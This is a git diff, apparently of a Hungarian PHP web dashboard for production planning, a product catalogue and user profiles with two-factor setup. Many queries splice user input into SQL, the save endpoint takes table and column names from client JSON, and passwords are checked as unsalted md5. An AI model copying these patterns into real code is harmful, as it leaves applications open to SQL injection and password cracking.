. $statistics_daily['item_id'] . "'"); + $data_stat = mysqli_fetch_array($sql)['data_status']; + if ($data_stat == 1) { + $is_new = "1"; + } + } + + $stock_endurance = ($score === "priority_score") ? intval($statistics_daily['stock_endurance']) : intval($statistics_daily['stock_box_endurance']); + $show_alert = ($score === "priority_score") ? $inventory_alert : $box_alert; + + if ($show_alert > $stock_endurance) { + $stock_endurance = '' . $stock_endurance . ''; + } + + $responseStr .= $statistics_daily['item_id'].'/!/'.$statistics_daily['warehouse_box'].'/!/'.(intval($statistics_daily['warehouse_total']) - intval($statistics_daily['warehouse_box'])).'/!/'.$stock_endurance.'/!/'.$av_prod.'/!/'.$statistics_daily['under_production'].'/!/'.$statistics_daily['under_boxing'].'/!/'.$is_new; + } + } + + echo '{"result": "ok", "data": "'.$responseStr.'", "maxpage": "'.$maxpage.'", "cpage": "'.$cpage.'"}'; + + } else if (htmlspecialchars($_POST["func"]) == "OpenSettings") { + + $keys = ['default_average_production', 'default_total_consumption', 'inventory_holding', 'inventory_alert', 'box_holding', 'box_alert']; + $placeholders = implode(',', array_fill(0, count($keys), '?')); + + $stmt = $conn->prepare("SELECT param_key, param_value FROM system_params WHERE param_key IN ($placeholders)"); + $stmt->bind_param(str_repeat('s', count($keys)), ...$keys); + $stmt->execute(); + $result = $stmt->get_result(); + + $params = []; + while ($row = $result->fetch_assoc()) { + $params[$row['param_key']] = $row['param_value']; + } + + $sql = mysqli_query($conn,"SELECT day_date FROM statistics_daily ORDER BY day_date ASC LIMIT 1"); + $oldest_statistics = mysqli_fetch_array($sql)[0]; + $statistics_daily = date('Y.m.d. H:i', $oldest_statistics); + + echo json_encode([ + 'default_average_production' => $params['default_average_production'], + 'default_total_consumption' => $params['default_total_consumption'], + 'inventory_holding' => $params['inventory_holding'], + 'inventory_alert' => $params['inventory_alert'], + 'box_holding' => $params['box_holding'], + 'box_alert' => $params['box_alert'], + 'statistics_daily' => $statistics_daily, + 'result' => 'ok' + ]); + } else if (htmlspecialchars($_POST["func"]) == "SaveSettings") { + $params = [ + 'default_total_consumption' => htmlspecialchars($_POST["default_total_consumption"]), + 'default_average_production' => htmlspecialchars($_POST["default_average_production"]), + 'inventory_holding' => htmlspecialchars($_POST["inventory_holding"]), + 'inventory_alert' => htmlspecialchars($_POST["inventory_alert"]), + 'box_holding' => htmlspecialchars($_POST["box_holding"]), + 'box_alert' => htmlspecialchars($_POST["box_alert"]) + ]; + + $stmt = $conn->prepare("UPDATE system_params SET param_value = ? WHERE param_key = ?"); + + foreach ($params as $key => $value) { + $stmt->bind_param('ss', $value, $key); + $stmt->execute(); + } + $stmt->close(); + + echo json_encode(['result' => 'ok']); + } else if (htmlspecialchars($_POST["func"]) == "OpenInfo") { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + + $sql = mysqli_query($conn,"SELECT * FROM statistics_daily WHERE item_id = '$item_id'"); + $statistics_daily = mysqli_fetch_array($sql); + + $annual_result = mysqli_query($conn, "SELECT * FROM statistics_annual WHERE item_id = '$item_id' AND year = (SELECT MAX(year) FROM statistics_annual WHERE item_id = '$item_id') LIMIT 1"); + $statistics_annual = mysqli_fetch_assoc($annual_result); + + $sql = mysqli_query($conn,"SELECT * FROM system_params"); + $system_params = []; + while ($row = mysqli_fetch_assoc($sql)) { + $system_params[$row['param_key']] = $row['param_value']; + } + + echo json_encode([ + 'day_date' => date('Y.m.d. H:i', $statistics_daily['day_date']) ?? 'N/A', + 'year' => $statistics_annual['year'] ?? 'N/A', + 'warehouse_total' => $statistics_daily['warehouse_total'] ?? 'N/A', + 'stock_endurance' => $statistics_daily['stock_endurance'] ?? 'N/A', + 'under_production' => $statistics_daily['under_production'] ?? 'N/A', + 'under_boxing' => $statistics_daily['under_boxing'] ?? 'N/A', + 'under_sales' => $statistics_daily['under_sales'] ?? 'N/A', + 'total_consumption' => $statistics_annual['total_consumption'] ?? 'N/A', + 'average_production' => $statistics_annual['average_production'] ?? 'N/A', + 'average_scrap' => $statistics_annual['average_scrap'] ?? 'N/A', + 'inventory_alert' => $system_params['inventory_alert'], + 'warehouse_box' => $statistics_daily['warehouse_box'] ?? 'N/A', + 'warehouse_foil' => (intval($statistics_daily['warehouse_total']) - intval($statistics_daily['warehouse_box'])) ?? 'N/A', + 'stock_box_endurance' => $statistics_daily['stock_box_endurance'] ?? 'N/A', + 'free_stock' => $statistics_daily['free_stock'] ?? 'N/A', + 'result' => 'ok' + ]); + + } else if (htmlspecialchars($_POST["func"]) == "CreateProduction") { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id']) ?? ''); + $category = htmlspecialchars($_POST['type'] ?? ''); + + /* Tábla validálás */ + $validCategories = [ + 'classic' => 'production_classic', + 'injmold' => 'production_injmold', + 'sporty' => 'production_sporty' + ]; + + if (!array_key_exists($category, $validCategories)) { + echo json_encode(['result' => 'Érvénytelen típus']); + exit; + } + + $sql_table = $validCategories[$category]; + + /* Gyártandó termék mennyisége */ + $sql = mysqli_query($conn,"SELECT * FROM statistics_daily WHERE item_id = '$item_id'"); + $statistics_daily = mysqli_fetch_array($sql); + + if ($statistics_daily['priority_score'] == null || $statistics_daily['priority_score'] == '') { + echo json_encode(['result' => 'Ez a cikkszám nem vehető fel gyártásba!']); + exit(); + } + + $annual_result = mysqli_query($conn, "SELECT * FROM statistics_annual WHERE item_id = '$item_id' AND year = (SELECT MAX(year) FROM statistics_annual WHERE item_id = '$item_id') LIMIT 1"); + $statistics_annual = mysqli_fetch_assoc($annual_result); + + $sql = mysqli_query($conn,"SELECT * FROM system_params"); + $system_params = []; + while ($row = mysqli_fetch_assoc($sql)) { + $system_params[$row['param_key']] = $row['param_value']; + } + + $daily_consumption = ($statistics_annual["total_consumption"] ?? $system_params["default_total_consumption"]) / 365; + $inventory_holding_amount = $daily_consumption * ($system_params["inventory_holding"] + ($statistics_annual['average_production'] ?? $system_params['default_average_production'])); + $to_invholding = $inventory_holding_amount - ($statistics_daily["warehouse_total"] ?? 0) + ($statistics_annual['average_scrap'] ?? 0); + + $db_start = ceil($to_invholding / 10) * 10; + + /* SQL */ + $sql = mysqli_query($conn,"INSERT INTO $sql_table(item_id, db_start) VALUES ('$item_id', $db_start)"); + $prid = mysqli_insert_id($conn); + + $_GET['type'] = 'daily'; + $_GET['item_id'] = $item_id; + $_GET['silent'] = true; + include '../managers/statistics.php'; + + /* Táblázati adatok kitöltése */ + if ($category == "classic" || $category == "sporty") { + $sql = mysqli_query($conn,"SELECT tablesize_x, tablesize_y FROM pr_cutting_parameters WHERE item_id = '$item_id'"); + $pr_cutting_parameters = mysqli_fetch_array($sql); + if ($pr_cutting_parameters != null) { + $tablesize_x = intval($pr_cutting_parameters['tablesize_x']) ?? 0; + $tablesize_y = intval($pr_cutting_parameters['tablesize_y']) ?? 0; + + $sql = mysqli_query($conn,"SELECT sum(left_db) as left_db, sum(right_db) as right_db FROM warehouse_foil WHERE item_id = '$item_id'"); + $value = mysqli_fetch_array($sql); + + $difference = intval($value["left_db"]) - intval($value["right_db"]); + $remain_l = abs($difference); + $remain_r = abs($difference); + if ($difference > 0) { + $remain_r = 0; + } else { + $remain_l = 0; + } + + $sql = mysqli_query($conn,"UPDATE $sql_table SET tablesize_x = $tablesize_x, tablesize_y = $tablesize_y, remain_r = $remain_r, remain_l = $remain_l WHERE pr_id = '$prid'"); + } + } + + echo json_encode(['result' => 'ok', 'db_start' => $db_start]); + + } else if (htmlspecialchars($_POST["func"]) == "CreateBoxing") { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id']) ?? ''); + + $annual_result = mysqli_query($conn, "SELECT * FROM statistics_annual WHERE item_id = '$item_id' AND year = (SELECT MAX(year) FROM statistics_annual WHERE item_id = '$item_id') LIMIT 1"); + $statistics_annual = mysqli_fetch_assoc($annual_result); + + $sql = mysqli_query($conn,"SELECT warehouse_total, warehouse_box FROM statistics_daily WHERE item_id = '$item_id'"); + $statistics_daily = mysqli_fetch_array($sql); + + $sql = mysqli_query($conn,"SELECT * FROM system_params"); + $system_params = []; + while ($row = mysqli_fetch_assoc($sql)) { + $system_params[$row['param_key']] = $row['param_value']; + } + + $in_foil_warehouse = intval($statistics_daily['warehouse_total']) - intval($statistics_daily['warehouse_box']); + $daily_consumption = ($statistics_annual["total_consumption"] ?? $system_params["default_total_consumption"]) / 365; + $need_to_box = intval($system_params['box_holding']) * $daily_consumption - intval($statistics_daily['warehouse_box']); + + $min_db = min(max(5, ceil($need_to_box)), $in_foil_warehouse); + + $sql = mysqli_query($conn,"INSERT INTO production_boxing(item_id, db_start) VALUES ('$item_id', $min_db)"); + echo json_encode(['result' => 'ok', 'db_start' => $min_db]); + + $_GET['type'] = 'daily'; + $_GET['item_id'] = $item_id; + $_GET['silent'] = true; + include '../managers/statistics.php'; + + } else if (htmlspecialchars($_POST["func"]) == "statistics") { + $data = []; + + // Classic adatok + $classicQuery = "SELECT stage, COUNT(*) as item_count, SUM(db_start) as total_db_start FROM production_classic WHERE stage != 0 GROUP BY stage"; + $classicResult = $conn->query($classicQuery); + if ($classicResult) { + while ($row = $classicResult->fetch_assoc()) { + $data[] = [ + 'stage' => $row['stage'], + 'item_count' => $row['item_count'], + 'is_boxing' => false, + 'type' => 'classic', + 'db_start' => $row['total_db_start'] + ]; + } + } + + // Sports adatok + $sportyQuery = "SELECT stage, COUNT(*) as item_count, SUM(db_start) as total_db_start FROM production_sporty WHERE stage != 0 GROUP BY stage"; + $sportyResult = $conn->query($sportyQuery); + if ($sportyResult) { + while ($row = $sportyResult->fetch_assoc()) { + $data[] = [ + 'stage' => $row['stage'], + 'item_count' => $row['item_count'], + 'is_boxing' => false, + 'type' => 'sporty', + 'db_start' => $row['total_db_start'] + ]; + } + } + + // Injmold adatok + $injmoldQuery = "SELECT stage, COUNT(*) as item_count, SUM(db_start) as total_db_start FROM production_injmold WHERE stage != 0 GROUP BY stage"; + $injmoldResult = $conn->query($injmoldQuery); + if ($injmoldResult) { + while ($row = $injmoldResult->fetch_assoc()) { + $data[] = [ + 'stage' => $row['stage'], + 'item_count' => $row['item_count'], + 'is_boxing' => false, + 'type' => 'injmold', + 'db_start' => $row['total_db_start'] + ]; + } + } + + // Boxing adatok + $boxingQuery = "SELECT stage, COUNT(*) as item_count, SUM(db_start) as total_db_start, + CASE + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^[0-9]+$' THEN 'classic' + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^CL[P|M]?[0-9]+$' THEN 'climair' + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^FR[0-9]{4}$' THEN 'injmold' + WHEN SUBSTRING_INDEX(item_id, '+', 1) REGEXP '^F[0-9]{4}$' THEN 'sporty' + ELSE 'unknown' + END AS category + FROM production_boxing + WHERE stage != 0 + GROUP BY stage, category"; + + $boxingResult = $conn->query($boxingQuery); + if ($boxingResult) { + while ($row = $boxingResult->fetch_assoc()) { + $data[] = [ + 'stage' => $row['stage'], + 'item_count' => $row['item_count'], + 'is_boxing' => true, + 'type' => $row['category'], + 'db_start' => $row['total_db_start'] + ]; + } + } + + + // Összesítő: classic, sporty, injmold + $stageTypes = []; + $totals = []; + + foreach ($data as $item) { + if (in_array($item['type'], ['classic', 'sporty', 'injmold'])) { + $stage = $item['stage']; + $isBoxing = $item['is_boxing'] ? 'boxing' : 'production'; + + if (!isset($stageTypes[$stage])) { + $stageTypes[$stage] = []; + } + $stageTypes[$stage][] = $item['type']; + + $key = $stage . '_' . $isBoxing; + + if (!isset($totals[$key])) { + $totals[$key] = [ + 'stage' => $stage, + 'item_count' => 0, + 'is_boxing' => $item['is_boxing'], + 'type' => 'total', + 'db_start' => 0 + ]; + } + $totals[$key]['item_count'] += $item['item_count']; + $totals[$key]['db_start'] += $item['db_start']; + } + } + + foreach ($totals as $key => $total) { + list($stage, $isBoxing) = explode('_', $key); + + $boxingTypes = array_filter($stageTypes[$stage], function($type) use ($data, $stage, $isBoxing) { + foreach ($data as $item) { + if ($item['stage'] == $stage && $item['type'] == $type && + ($item['is_boxing'] ? 'boxing' : 'production') == $isBoxing) { + return true; + } + } + return false; + }); + + if (count(array_unique($boxingTypes)) > 1) { + $data[] = $total; + } + } + + + echo json_encode(['result' => 'ok', 'data' => $data]); + } + exit(); +} + +?> + + + + + + + + Kezelőfelület + + + + +
    +
    +

    Title

    +
    +
    +
    +
    +
    +
    +
    +
    +
    + + + +

    Gyártástervező

    + + + marketing + + + +
    +
    +

    Cikkszám:

    + +
    +

    Rendezés:

    + +
    +

    Gyártás alatt lévők:

    +
    + + +
    +
    +

    Dobozolás alatt lévők:

    +
    + + +
    +
    +

    Oldalanként:

    + +
    +

    :

    + +
    + +
    +

    :

    + +
    + +
    + +
    +
    +
    + +
    +
    + + + + + + + + + + + + + +
    CikkszámRaktáronKészletkitartás napÉves fogyásInfo
    +
    +
    + +
    +
    +

    <    0 / 0    >

    +
    + +


    + + + +
    + + + + diff --git a/dashboard/products.php b/dashboard/products.php new file mode 100644 index 0000000..2198fb7 --- /dev/null +++ b/dashboard/products.php @@ -0,0 +1,1078 @@ += 1 && $cpage <= $maxpage)) { + $cpage = 1; + } + + $limit = ($cpage - 1) * $maxperpage; + + $responseStr = ''; + $query = "SELECT * FROM pr_parameters".$addquery." LIMIT $limit, $maxperpage"; + if ($result = $conn->query($query)) { + while ($c_pr_parameters = $result->fetch_assoc()) { + + if ($responseStr != "") { + $responseStr .= "|%|"; + } + + $responseStr .= escapeForJson($c_pr_parameters['item_id']).'/!/'.escapeForJson($c_pr_parameters['name_in_db']).'/!/'.escapeForJson($c_pr_parameters['category']).'/!/'.escapeForJson($c_pr_parameters['car_brand']).'/!/'.escapeForJson($c_pr_parameters['car_type']).'/!/'.escapeForJson($c_pr_parameters['car_year']).'/!/'.escapeForJson($c_pr_parameters['car_doors']); + } + } + + echo '{"result": "ok", "data": "'.$responseStr.'", "maxpage": "'.$maxpage.'", "cpage": "'.$cpage.'"}'; + + } else if (htmlspecialchars($_POST["func"]) == "filter") { + + if (!isset($_COOKIE['maxperpage'])) { + setcookie("maxperpage", "25", time() + (86400 * 90), "/"); + $maxperpage = "25"; + } else { + $maxperpage = $_COOKIE['maxperpage']; + } + + setcookie("maxperpage", strval($maxperpage), time() + (86400 * 90), "/"); + + $perpageselect = " + + + + + "; + $perpageselect = str_replace("value='".$maxperpage."'", "value='".$maxperpage."' selected", $perpageselect); + + $category = ''; + $query = "SELECT DISTINCT category FROM pr_parameters ORDER BY category ASC"; + if ($result = $conn->query($query)) { + while ($ccat = $result->fetch_assoc()) { + if ($ccat['category'] != null && $ccat['category'] != "") { + $category .= ""; + } + } + } + + $car_brand = ''; + $query = "SELECT DISTINCT car_brand FROM pr_parameters ORDER BY car_brand ASC"; + if ($result = $conn->query($query)) { + while ($ccar_brand = $result->fetch_assoc()) { + if ($ccar_brand['car_brand'] != null && $ccar_brand['car_brand'] != "") { + $car_brand .= ""; + } + } + } + + $car_type = ''; + $query = "SELECT DISTINCT car_type FROM pr_parameters ORDER BY car_type ASC"; + if ($result = $conn->query($query)) { + while ($ccar_type = $result->fetch_assoc()) { + if ($ccar_type['car_type'] != null && $ccar_type['car_type'] != "") { + $car_type .= ""; + } + } + } + + $car_doors = ''; + $query = "SELECT DISTINCT car_doors FROM pr_parameters ORDER BY car_doors ASC"; + if ($result = $conn->query($query)) { + while ($ccar_doors = $result->fetch_assoc()) { + if ($ccar_doors['car_doors'] != null && $ccar_doors['car_doors'] != "") { + $car_doors .= ""; + } + } + } + + + $json = json_encode(array( + 'category' => $category, + 'car_brand' => $car_brand, + 'car_type' => $car_type, + 'car_doors' => $car_doors, + 'perpage' => $perpageselect, + 'result' => 'ok' + )); + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "openproduct") { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $json = ""; + $all_product_information = array(); + + $data = json_decode(file_get_contents($currentUrl."/managers/prdb.json"), true); + if ($data) { + $Tables = []; + foreach ($data["DBList"] as $table) { + if (UserHasPerm($table["ID"]."_read") || UserHasPerm($table["ID"]."_edit") || UserHasPerm("edit_item_introduction_basic_data")) { + + $sql = mysqli_query($conn,"SELECT item_id FROM ".$table["ID"]." WHERE item_id = '$item_id'"); + if (mysqli_fetch_array($sql)) { + $query = "SELECT * FROM ".$table["ID"]." WHERE item_id = '$item_id'"; + if ($result = $conn->query($query)) { + while ($dbdata = $result->fetch_assoc()) { + + foreach ($data["Parameters"] as $param) { + if (strpos($param["ID"], $table['ID'] . "_") === 0) { + $newID = substr($param["ID"], strlen($table['ID']) + 1); + if (!($dbdata["data_status"] != "0" && !UserHasPerm($table["ID"]."_read"))) { + $all_product_information = array_merge($all_product_information, [$param["ID"] => $param["NAME"]."||".$dbdata[$newID]]); + } + } + } + + $uploader_uid = $dbdata["uploader_uid"]; + $sql = mysqli_query($conn,"SELECT full_name FROM users WHERE uid = '$uploader_uid'"); + $userUploaderName = $coderclass->decode(mysqli_fetch_array($sql)[0], "TIT4"); + + $all_product_information = array_merge($all_product_information, [$table['ID'].'_uploader_name' => $userUploaderName]); + $all_product_information = array_merge($all_product_information, [$table['ID'] => $table["NAME"]]); + $all_product_information = array_merge($all_product_information, [$table['ID'].'_registration_date' => date("Y-m-d H:i:s", $dbdata["registration_date"])]); + $all_product_information = array_merge($all_product_information, [$table['ID'].'_data_status' => $dbdata["data_status"]]); + + $EditingPerm = false; + if ($dbdata["data_status"] == "0" && UserHasPerm("edit_item_introduction_basic_data")) { + $EditingPerm = true; + } else if (UserHasPerm($table["ID"]."_edit")) { + $EditingPerm = true; + } + + $CanSee = true; + if ($dbdata["data_status"] != "0" && !UserHasPerm($table["ID"]."_read")) { + $CanSee = false; + } + + $all_product_information = array_merge($all_product_information, [$table['ID'].'_can_see' => $CanSee]); + $all_product_information = array_merge($all_product_information, [$table['ID'].'_can_edit' => $EditingPerm]); + + } + } + } else if (UserHasPerm($table["ID"]."_edit") || UserHasPerm("edit_item_introduction_basic_data")) { + $all_product_information = array_merge($all_product_information, [$table['ID'] => $table["NAME"]]); + $all_product_information = array_merge($all_product_information, [$table['ID'].'_can_edit' => true]); + } + + } else { + $all_product_information = array_merge($all_product_information, [$table['ID'].'_can_see' => false]); + } + + } + + $item_query = "SELECT average_production, average_scrap, produced_quantity, total_consumption, went_into_production, year FROM statistics_annual WHERE item_id = '" . $item_id . "' ORDER BY year DESC"; + $result = mysqli_query($conn, $item_query); + + $statistics_annual = []; + if ($result) { + while ($row = mysqli_fetch_assoc($result)) { + $statistics_annual[] = $row; + } + } + + $all_product_information = array_merge( $all_product_information, ["result" => "ok", "item_id" => $item_id, "statistics_annual" => $statistics_annual] ); + + $json = json_encode($all_product_information); + } else { + $json = json_encode(["result" => "DB Table loading error!"]); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "addtable") { + $item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $table_id = htmlspecialchars($_POST["table_id"]); + $LocalData = json_decode(file_get_contents($currentUrl."/managers/prdb.json"), true); + $json = ""; + + if ($LocalData && (UserHasPerm("edit_item_introduction_basic_data") || UserHasPerm($table_id."_edit"))) { + + $isDB = false; + foreach ($LocalData["DBList"] as $item) { + if ($item["ID"] === $table_id) { + $isDB = true; + break; + } + } + + if ($isDB) { + $sql = mysqli_query($conn,"SELECT item_id FROM ".$table_id." WHERE item_id = '$item_id'"); + $test = mysqli_fetch_array($sql); + $ctimestamp = time(); + + if (!$test) { + $sql = mysqli_query($conn,"SELECT data_status FROM pr_parameters WHERE item_id = '$item_id'"); + $DataStatus = mysqli_fetch_array($sql)[0]; + + $sql = mysqli_query($conn,"INSERT INTO ".$table_id." (item_id, uploader_uid, registration_date, data_status) VALUES ('".$item_id."', ".$userID.", ".$ctimestamp.", ".$DataStatus.")"); + $json = json_encode(["result" => "ok"]); + } else { + $json = json_encode(["result" => "Ez a tábla már létezik!"]); + } + } else { + $json = json_encode(["result" => "Nem létezik ilyen nevű táblázat!"]); + } + } else { + $json = json_encode(["result" => "Jogosultság megtagadva!"]); + } + + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "SaveNewItemIDName") { + $old_item_id = htmlspecialchars(str_replace(' ', '+', $_POST['item_id'])); + $new_item_id = htmlspecialchars(str_replace(' ', '+', $_POST['new_item_id'])); + + if (UserHasPerm("god_profile")) { + $sql = mysqli_query($conn,"SELECT item_id FROM pr_parameters WHERE item_id = '$old_item_id'"); + $check_item_id = mysqli_fetch_array($sql)[0]; + + $sql = mysqli_query($conn,"SELECT item_id FROM pr_parameters WHERE item_id = '$new_item_id'"); + $check_new_item_id = mysqli_fetch_array($sql)[0]; + + if ($check_item_id != null && $check_new_item_id == null) { + $sql = "SELECT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE COLUMN_NAME = 'item_id';"; + $result = $conn->query($sql); + if ($result) { + while ($row = $result->fetch_assoc()) { + $table = $row['TABLE_NAME']; + + $update_sql = mysqli_query($conn,"UPDATE $table SET item_id = '$new_item_id' WHERE item_id = '$old_item_id'"); + } + $json = json_encode(["result" => "ok", "item_id" => $new_item_id]); + } else { + $json = json_encode(["result" => "Hiba a táblák lekérdezésekor: " . $conn->error]); + } + } else if ($check_item_id == null) { + $json = json_encode(["result" => "Nem létező cikkszámot szeretne módosítani!"]); + } else { + $json = json_encode(["result" => "Ilyen azonosítóval létezik már cikkszám!"]); + } + } else { + $json = json_encode(["result" => "Jogosultság megtagadva!"]); + } + echo $json; + } else if (htmlspecialchars($_POST["func"]) == "GenerateExport") { + $json = ""; + $all_product_information = array(); + + $data = json_decode(file_get_contents($currentUrl."/managers/prdb.json"), true); + if ($data) { + + $query = "SELECT item_id, data_status, price_category FROM pr_parameters"; + if ($result = $conn->query($query)) { + while ($c_export = $result->fetch_assoc()) { + $c_item_id = $c_export['item_id']; + + $all_product_information[$c_item_id][] = [ + "name" => 'Cikkszám', + "value" => $c_item_id + ]; + + foreach ($data["DBList"] as $table) { + $c_table_id = $table["ID"]; + if (UserHasPerm($c_table_id."_read") || UserHasPerm($c_table_id."_edit")) { + + $sql = mysqli_query($conn,"SELECT * FROM $c_table_id WHERE item_id = '$c_item_id'"); + $c_result = mysqli_fetch_array($sql); + + foreach ($data["Parameters"] as $param) { + if (strpos($param["ID"], $table['ID'] . "_") === 0) { + $newID = substr($param["ID"], strlen($table['ID']) + 1); + + if ($c_result != null) { + $all_product_information[$c_item_id][] = [ + "name" => $param["NAME"], + "value" => $c_result[$newID] + ]; + } else { + $all_product_information[$c_item_id][] = [ + "name" => $param["NAME"], + "value" => '' + ]; + } + + } + } + + } + } + + $statusText = match (intval($c_export["data_status"])) { + 1 => 'Értékesíthető', + 0 => 'Bevezetés alatt', + -1 => 'Kifutó', + -2 => 'Megszűnt', + default => 'Ismeretlen', + }; + + $all_product_information[$c_item_id][] = [ + "name" => 'Termék státusza', + "value" => $statusText + ]; + + $category_name = $c_export["price_category"]; + $query_price = "SELECT type_name, currency, price FROM customer_types WHERE is_active = 1 and category_name = '$category_name'"; + if ($result_price = $conn->query($query_price)) { + while ($c_price = $result_price->fetch_assoc()) { + $all_product_information[$c_item_id][] = [ + "name" => $c_price['type_name'] . ' ár', + "value" => $c_price['price'] . ' ' . $c_price['currency'] + ]; + } + } + + } + } + + + $json = json_encode(["result" => "ok", "data" => $all_product_information]); + } else { + $json = json_encode(["result" => "DB Table loading error!"]); + } + + echo $json; + } + + exit(); +} else if (isset($_GET['saving']) && $_GET['saving'] == 1) { + + header("Content-Type: application/json"); + + $jsonData = file_get_contents("php://input"); + $data = json_decode($jsonData, true); + + $LocalData = json_decode(file_get_contents($currentUrl."/managers/prdb.json"), true); + + if ($data) { + $tables = []; + + foreach ($data as $key => $value) { + if (strpos($key, "_can_edit") !== false && $value === "true") { + $tableName = str_replace("_can_edit", "", $key); + + $sql = mysqli_query($conn,"SELECT data_status FROM ".$tableName." WHERE item_id = '".$data['item_id']."'"); + $tableDataStatus = mysqli_fetch_array($sql)[0]; + + $EditingPerm = false; + if ($tableDataStatus == "0" && UserHasPerm("edit_item_introduction_basic_data")) { + $EditingPerm = true; + } else if (UserHasPerm($tableName.'_edit')) { + $EditingPerm = true; + } + + if ($EditingPerm) { + $tables[] = $tableName; + } + + } + } + + $response = []; + + foreach ($tables as $table) { + $updateFields = []; + $updateValues = []; + + foreach ($data as $key => $value) { + if (strpos($key, $table . "_") === 0 && $key !== $table . "_can_edit") { + $columnName = str_replace($table . "_", "", $key); + + if ($table == "pr_warehouse_parameters" && $columnName == "size" && $data[$table."_".$columnName] != "") { + $boxsizeoptions = array_column($LocalData['BoxSizes'], 'Name'); + if (!in_array($data[$table."_".$columnName], $boxsizeoptions, true)) { + echo json_encode(["status" => "error", "message" => "Nem megfelelő doboz méretet adott meg a Raktározási paramétereknél!"]); + die(); + } + } + + $updateFields[] = "$columnName = '".htmlspecialchars($data[$table."_".$columnName])."'"; + $updateValues[] = $value; + } + } + + if (!empty($updateFields)) { + $updateQuery = "UPDATE $table SET " . implode(", ", $updateFields) . " WHERE item_id = '".$data['item_id']."'"; + $sql = mysqli_query($conn, $updateQuery); + } + } + + echo json_encode(["status" => "done", "updates" => $response]); + + } else { + echo json_encode(["status" => "error", "message" => "Hibás adat"]); + } + + exit(); +} + +?> + + + + + + + Kezelőfelület + + + +
    +
    +

    Title

    +
    +
    +
    +
    +
    +
    +
    +
    +
    + + + +

    Termékkatalógus

    + + + external-xlsx-file-file-extension-fauzidea-flat-fauzidea + + +
    +
    +

    Cikkszám:

    + +
    +

    Terméknév:

    + +
    +

    Termékkategória:

    + +
    +

    Autó:

    + +
    +

    Típus:

    + +
    +

    Évjárat:

    + +
    +

    Ajtók:

    + +
    +

    Adat státusza:

    + '; + } else { + echo ''; + } + ?> +
    +

    Oldalanként:

    + +
    +

    :

    + +
    +
    + +
    +
    +
    + +
    +
    + + + + + + + + + + + + + + + + +
    CikkszámTerméknévTermékkategóriaAutóTípusÉvjáratAjtókAdatlap
    +
    +
    + +
    +
    +

    <    0 / 0    >

    +
    + +


    + + + +
    + + + + + diff --git a/dashboard/profile.php b/dashboard/profile.php new file mode 100644 index 0000000..31c10da --- /dev/null +++ b/dashboard/profile.php @@ -0,0 +1,353 @@ +isValidKey($otckey) == false) { + echo "Váratlan hiba történt az egyedik kód generálásában, kérem vegye fel újra a kódot a hitelesítő alkalmazásába, és frissítse az oldalt!"; + } else if($totp->getOtp($otckey) == $otc) { + $hashto2fa = $coderclass->encode($otckey, "J57A"); + $sql = mysqli_query($conn,"UPDATE users SET otphash = '$hashto2fa' WHERE uid = '$userID'"); + echo "ok"; + } else { + echo "A hitelesítő kód nem egyezik!"; + } + + } else if (htmlspecialchars($_POST['f']) == 'Settings2fa') { + $type = ''; + $type .= ''; + $type = str_replace('value="'.$userDataSQL["otptype"].'"', 'value="'.$userDataSQL["otptype"].'" selected', $type); + + if ($userDataSQL["otptype"] == 2) {$type = "NOEDIT 1";} else if ($userDataSQL["otptype"] == 3) {$type = "NOEDIT 2";} + + echo json_encode(["status" => "ok", "type" => $type]); + + } else if (htmlspecialchars($_POST['f']) == 'Delete2fa') { + $pass = md5($_POST['pass']); + if ($pass != $userDataSQL["upass"]) { + echo "A jelszó helytelen!"; + } else if ($type == 2 || $type == 3) { + echo "A fiók valamilyen ok miatt megköveteli a kétfaktoros hitelesítést, ezért nem deaktiválható!"; + } else { + $sql = mysqli_query($conn,"UPDATE users SET otphash = '' WHERE uid = '$userID'"); + echo 'ok'; + } + } else if (htmlspecialchars($_POST['f']) == 'Save2fa') { + $pass = md5($_POST['pass']); + $type = $_POST['type']; + if ($pass != $userDataSQL["upass"]) { + echo "A jelszó helytelen!"; + } else if ($type != 0 && $type != 1) { + echo "Váratlan hiba történt, töltse újra az oldalt, és próbálja újra!"; + }else { + $sql = mysqli_query($conn,"UPDATE users SET otptype = $type WHERE uid = '$userID'"); + setcookie("otpauth", "", time() - 3600, "/"); + echo 'ok'; + } + } + + die(); +} else if (isset($_POST['f'])) { + echo "Titkos token hiba! Frissítse az oldalt, és próbálja újra!"; + die(); +} + +$usermail = $coderclass->decode($userDataSQL["mail"], "A7SO"); +$userPosition = $coderclass->decode($userDataSQL["position"], "SWI2"); + +$userPerms = ""; + + +$anticsrfid = bin2hex(random_bytes(24)); +$_SESSION["anticsrfid"] = $anticsrfid; +?> + + + + + + + Kezelőfelület + + + +
    +
    +

    Title

    +
    +
    +
    +
    +
    +
    +
    +
    +
    + + + +
    +

    Fiókom adatlapja

    +

    Felhasználó neve:

    +

    Felhasználó email címe:

    +

    Beosztása:

    +

    Jelszó módosítása:

    +

    +

    +

    + +
    + +
    +

    Fiókomhoz társított jogok

    +

    13) {echo "Az első 12 legfontosabb jog";}?>

    + +
    + +
    +

    Kétlépcsős hitelesítés

    + Aktív! Módosítás

    "; + } else { + $totpKey = $totp->generateKey(); + + $totpQRCode = 'otpauth://totp/Szaturnusz?secret='.$totpKey.'&issuer=saturn&algorithm=SHA1&digits=6&period=30'; + + echo '

    Scannelje be a QR kódot hitelesítő alkalmazásában,
    (pl: Google Authenticator, Authy, Microsoft Authenticator)
    majd írja be a kapott kódot.


    '; + echo '
    '; + echo '

    '.$totpKey.'

    '; + echo ' +
    + + +
    '; + } + + ?> +
    + + + +
